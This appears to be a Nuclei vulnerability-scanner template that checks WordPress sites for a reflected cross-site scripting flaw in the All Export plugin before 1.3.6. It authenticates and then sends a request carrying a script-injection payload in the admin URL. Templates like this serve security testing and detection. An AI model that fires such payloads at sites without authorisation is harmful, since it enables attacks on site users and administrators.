id: wp-all-export-xss

info:
  name: WordPress All Export <1.3.6 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 2
  tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=pmxe-admin-manage&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'manage&a\"><script>alert(1)</script>">'
          - 'Manage Exports'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eb7f907aa1766b7f24848c3ddf6bc93303b447f64f96d715c36e3553234ef2460221009d4f7bd35c3b57fd866180185dba162da0abec6a71a127c4bc926ff31b128829:922c64590222798bb761d5b6d8e72950